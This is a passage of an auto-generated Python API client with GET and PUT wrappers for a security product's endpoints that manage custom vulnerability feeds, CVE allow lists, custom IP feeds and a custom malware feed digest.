    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.api_v1_feeds_custom_custom_vulnerabilities_digest_get_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(str, status_code(int), headers(HTTPHeaderDict))
    """
    # Snapshot of the named parameters plus the raw **kwargs dict; kwargs
    # entries are validated and folded in below (generator convention).
    local_var_params = locals()

    # This endpoint declares no operation-specific parameters; only the
    # generic client options below are accepted.
    all_params = [
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject any keyword argument the operation does not define.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_custom_custom_vulnerabilities_digest_get" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    collection_formats = {}

    # No path, query, form or body parameters for this endpoint.
    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # A 200 response is deserialized as a plain string (the digest).
    response_types_map = {
        200: "str",
    }

    return self.api_client.call_api(
        '/api/v1/feeds/custom/custom-vulnerabilities/digest', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_custom_vulnerabilities_get(self, **kwargs):  # noqa: E501
    """api_v1_feeds_custom_custom_vulnerabilities_get  # noqa: E501

    CustomVulnerabilities returns the custom vulnerabilities feed.  # noqa: E501

    Convenience wrapper around
    :meth:`api_v1_feeds_custom_custom_vulnerabilities_get_with_http_info`
    that returns only the response data, discarding status code and headers.
    Accepts the same keyword arguments; pass ``async_req=True`` for an
    asynchronous request (the request thread is returned instead).

    :return: the feed model (or the request thread when async).
    :rtype: VulnCustomVulnerabilities
    """
    # Force data-only mode, then delegate the real work.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_custom_custom_vulnerabilities_get_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_custom_custom_vulnerabilities_get_with_http_info(self, **kwargs):  # noqa: E501
    """api_v1_feeds_custom_custom_vulnerabilities_get  # noqa: E501

    CustomVulnerabilities returns the custom vulnerabilities feed  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.api_v1_feeds_custom_custom_vulnerabilities_get_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(VulnCustomVulnerabilities, status_code(int), headers(HTTPHeaderDict))
    """
    # Snapshot of the named parameters plus the raw **kwargs dict; kwargs
    # entries are validated and folded in below (generator convention).
    local_var_params = locals()

    # This endpoint declares no operation-specific parameters; only the
    # generic client options below are accepted.
    all_params = [
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject any keyword argument the operation does not define.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_custom_custom_vulnerabilities_get" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    collection_formats = {}

    # No path, query, form or body parameters for this endpoint.
    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # A 200 response is deserialized into the feed model.
    response_types_map = {
        200: "VulnCustomVulnerabilities",
    }

    return self.api_client.call_api(
        '/api/v1/feeds/custom/custom-vulnerabilities', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def api_v1_feeds_custom_custom_vulnerabilities_put(self, **kwargs):  # noqa: E501
    """api_v1_feeds_custom_custom_vulnerabilities_put  # noqa: E501

    SetCustomVulnerabilities sets the custom vulnerabilities feed.  # noqa: E501

    Convenience wrapper around
    :meth:`api_v1_feeds_custom_custom_vulnerabilities_put_with_http_info`
    that returns only the response data, discarding status code and headers.
    Accepts the same keyword arguments, notably
    ``vuln_custom_vulnerabilities`` (VulnCustomVulnerabilities); pass
    ``async_req=True`` for an asynchronous request (the request thread is
    returned instead).

    :return: the result object (or the request thread when async).
    :rtype: None
    """
    # Force data-only mode, then delegate the real work.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_custom_custom_vulnerabilities_put_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_custom_custom_vulnerabilities_put_with_http_info(self, **kwargs):  # noqa: E501
    """SetCustomVulnerabilities sets the custom vulnerabilities feed.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_custom_vulnerabilities_put_with_http_info(async_req=True)
    >>> result = thread.get()

    :param vuln_custom_vulnerabilities: feed payload sent as the request body
    :type vuln_custom_vulnerabilities: VulnCustomVulnerabilities
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data only, without status code
        and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :param _request_auth: overrides the spec's auth_settings for this
        single request.
    :type _request_auth: dict, optional
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: None
    """
    # Reject any keyword the endpoint does not understand.
    accepted = [
        'vuln_custom_vulnerabilities',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ]
    for arg in kwargs:
        if arg not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_custom_custom_vulnerabilities_put" % arg
            )
    params = dict(kwargs)

    # No path/query/form parameters; the feed object travels as the body.
    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}
    body_params = params.get('vuln_custom_vulnerabilities')
    header_params = {
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),
    }
    auth_settings = []  # no authentication configured for this call
    response_types_map = {}  # endpoint returns no deserializable body

    return self.api_client.call_api(
        '/api/v1/feeds/custom/custom-vulnerabilities', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=params.get('_request_auth'))
def api_v1_feeds_custom_cve_allow_list_digest_get(self, **kwargs):  # noqa: E501
    """CVEAllowListDigest returns the CVE allow list digest.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_cve_allow_list_digest_get(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: str
    """
    # Convenience wrapper: callers only want the response body, not the
    # (data, status, headers) tuple produced by the *_with_http_info form.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_custom_cve_allow_list_digest_get_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_custom_cve_allow_list_digest_get_with_http_info(self, **kwargs):  # noqa: E501
    """CVEAllowListDigest returns the CVE allow list digest.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_cve_allow_list_digest_get_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data only, without status code
        and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :param _request_auth: overrides the spec's auth_settings for this
        single request.
    :type _request_auth: dict, optional
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: tuple(str, status_code(int), headers(HTTPHeaderDict))
    """
    # Reject any keyword the endpoint does not understand.
    accepted = [
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ]
    for arg in kwargs:
        if arg not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_custom_cve_allow_list_digest_get" % arg
            )
    params = dict(kwargs)

    # Plain GET: no path/query/form parameters and no request body.
    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }
    auth_settings = []  # no authentication configured for this call
    response_types_map = {
        200: "str",
    }

    return self.api_client.call_api(
        '/api/v1/feeds/custom/cve-allow-list/digest', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=params.get('_request_auth'))
def api_v1_feeds_custom_cve_allow_list_get(self, **kwargs):  # noqa: E501
    """CVEAllowList returns the list of allowed CVEs.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_cve_allow_list_get(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: SharedCVEAllowList
    """
    # Convenience wrapper: callers only want the response body, not the
    # (data, status, headers) tuple produced by the *_with_http_info form.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_custom_cve_allow_list_get_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_custom_cve_allow_list_get_with_http_info(self, **kwargs):  # noqa: E501
    """CVEAllowList returns the list of allowed CVEs.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_cve_allow_list_get_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data only, without status code
        and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :param _request_auth: overrides the spec's auth_settings for this
        single request.
    :type _request_auth: dict, optional
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: tuple(SharedCVEAllowList, status_code(int), headers(HTTPHeaderDict))
    """
    # Reject any keyword the endpoint does not understand.
    accepted = [
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ]
    for arg in kwargs:
        if arg not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_custom_cve_allow_list_get" % arg
            )
    params = dict(kwargs)

    # Plain GET: no path/query/form parameters and no request body.
    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }
    auth_settings = []  # no authentication configured for this call
    response_types_map = {
        200: "SharedCVEAllowList",
    }

    return self.api_client.call_api(
        '/api/v1/feeds/custom/cve-allow-list', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=params.get('_request_auth'))
def api_v1_feeds_custom_cve_allow_list_put(self, **kwargs):  # noqa: E501
    """SetCVEAllowList adds the given CVE allow list entries.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_cve_allow_list_put(async_req=True)
    >>> result = thread.get()

    :param shared_cve_allow_list: allow list payload sent as the request body
    :type shared_cve_allow_list: SharedCVEAllowList
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: None
    """
    # Convenience wrapper: callers only want the response body, not the
    # (data, status, headers) tuple produced by the *_with_http_info form.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_custom_cve_allow_list_put_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_custom_cve_allow_list_put_with_http_info(self, **kwargs):  # noqa: E501
    """SetCVEAllowList adds the given CVE allow list entries.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_cve_allow_list_put_with_http_info(async_req=True)
    >>> result = thread.get()

    :param shared_cve_allow_list: allow list payload sent as the request body
    :type shared_cve_allow_list: SharedCVEAllowList
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data only, without status code
        and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :param _request_auth: overrides the spec's auth_settings for this
        single request.
    :type _request_auth: dict, optional
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: None
    """
    # Reject any keyword the endpoint does not understand.
    accepted = [
        'shared_cve_allow_list',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ]
    for arg in kwargs:
        if arg not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_custom_cve_allow_list_put" % arg
            )
    params = dict(kwargs)

    # No path/query/form parameters; the allow list travels as the body.
    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}
    body_params = params.get('shared_cve_allow_list')
    header_params = {
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),
    }
    auth_settings = []  # no authentication configured for this call
    response_types_map = {}  # endpoint returns no deserializable body

    return self.api_client.call_api(
        '/api/v1/feeds/custom/cve-allow-list', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=params.get('_request_auth'))
def api_v1_feeds_custom_ips_digest_get(self, **kwargs):  # noqa: E501
    """CustomIPFeedDigest returns the custom ip feed digest.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_ips_digest_get(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: str
    """
    # Convenience wrapper: callers only want the response body, not the
    # (data, status, headers) tuple produced by the *_with_http_info form.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_custom_ips_digest_get_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_custom_ips_digest_get_with_http_info(self, **kwargs):  # noqa: E501
    """CustomIPFeedDigest returns the custom ip feed digest.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_ips_digest_get_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data only, without status code
        and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :param _request_auth: overrides the spec's auth_settings for this
        single request.
    :type _request_auth: dict, optional
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: tuple(str, status_code(int), headers(HTTPHeaderDict))
    """
    # Reject any keyword the endpoint does not understand.
    accepted = [
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ]
    for arg in kwargs:
        if arg not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_custom_ips_digest_get" % arg
            )
    params = dict(kwargs)

    # Plain GET: no path/query/form parameters and no request body.
    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }
    auth_settings = []  # no authentication configured for this call
    response_types_map = {
        200: "str",
    }

    return self.api_client.call_api(
        '/api/v1/feeds/custom/ips/digest', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=params.get('_request_auth'))
def api_v1_feeds_custom_ips_get(self, **kwargs):  # noqa: E501
    """CustomIPFeed returns the custom ip feed.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_ips_get(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: SharedCustomIPFeed
    """
    # Convenience wrapper: callers only want the response body, not the
    # (data, status, headers) tuple produced by the *_with_http_info form.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_custom_ips_get_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_custom_ips_get_with_http_info(self, **kwargs):  # noqa: E501
    """CustomIPFeed returns the custom ip feed.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_ips_get_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data only, without status code
        and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :param _request_auth: overrides the spec's auth_settings for this
        single request.
    :type _request_auth: dict, optional
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: tuple(SharedCustomIPFeed, status_code(int), headers(HTTPHeaderDict))
    """
    # Reject any keyword the endpoint does not understand.
    accepted = [
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ]
    for arg in kwargs:
        if arg not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_custom_ips_get" % arg
            )
    params = dict(kwargs)

    # Plain GET: no path/query/form parameters and no request body.
    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }
    auth_settings = []  # no authentication configured for this call
    response_types_map = {
        200: "SharedCustomIPFeed",
    }

    return self.api_client.call_api(
        '/api/v1/feeds/custom/ips', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=params.get('_request_auth'))
def api_v1_feeds_custom_ips_put(self, **kwargs):  # noqa: E501
    """SetCustomIPFeed sets the custom IP feed.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_ips_put(async_req=True)
    >>> result = thread.get()

    :param shared_custom_ip_feed: feed payload sent as the request body
    :type shared_custom_ip_feed: SharedCustomIPFeed
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: None
    """
    # Convenience wrapper: callers only want the response body, not the
    # (data, status, headers) tuple produced by the *_with_http_info form.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_custom_ips_put_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_custom_ips_put_with_http_info(self, **kwargs):  # noqa: E501
    """SetCustomIPFeed sets the custom IP feed.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_ips_put_with_http_info(async_req=True)
    >>> result = thread.get()

    :param shared_custom_ip_feed: feed payload sent as the request body
    :type shared_custom_ip_feed: SharedCustomIPFeed
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data only, without status code
        and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :param _request_auth: overrides the spec's auth_settings for this
        single request.
    :type _request_auth: dict, optional
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: None
    """
    # Reject any keyword the endpoint does not understand.
    accepted = [
        'shared_custom_ip_feed',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ]
    for arg in kwargs:
        if arg not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_custom_ips_put" % arg
            )
    params = dict(kwargs)

    # No path/query/form parameters; the feed object travels as the body.
    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}
    body_params = params.get('shared_custom_ip_feed')
    header_params = {
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),
    }
    auth_settings = []  # no authentication configured for this call
    response_types_map = {}  # endpoint returns no deserializable body

    return self.api_client.call_api(
        '/api/v1/feeds/custom/ips', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=params.get('_request_auth'))
def api_v1_feeds_custom_malware_digest_get(self, **kwargs):  # noqa: E501
    """CustomMalwareFeedDigest returns the custom malware feed digest.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_malware_digest_get(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: str
    """
    # Convenience wrapper: callers only want the response body, not the
    # (data, status, headers) tuple produced by the *_with_http_info form.
    kwargs.update(_return_http_data_only=True)
    return self.api_v1_feeds_custom_malware_digest_get_with_http_info(**kwargs)  # noqa: E501
def api_v1_feeds_custom_malware_digest_get_with_http_info(self, **kwargs):  # noqa: E501
    """CustomMalwareFeedDigest returns the custom malware feed digest.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to get the request
    thread back instead of the result.

    >>> thread = api.api_v1_feeds_custom_malware_digest_get_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data only, without status code
        and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding the response data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout in seconds, or a
        (connection, read) tuple of timeouts.
    :param _request_auth: overrides the spec's auth_settings for this
        single request.
    :type _request_auth: dict, optional
    :return: Returns the result object; the request thread when called
        asynchronously.
    :rtype: tuple(str, status_code(int), headers(HTTPHeaderDict))
    """
    # Reject any keyword the endpoint does not understand.
    accepted = [
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ]
    for arg in kwargs:
        if arg not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_v1_feeds_custom_malware_digest_get" % arg
            )
    params = dict(kwargs)

    # Plain GET: no path/query/form parameters and no request body.
    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }
    auth_settings = []  # no authentication configured for this call
    response_types_map = {
        200: "str",
    }

    return self.api_client.call_api(
        '/api/v1/feeds/custom/malware/digest', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
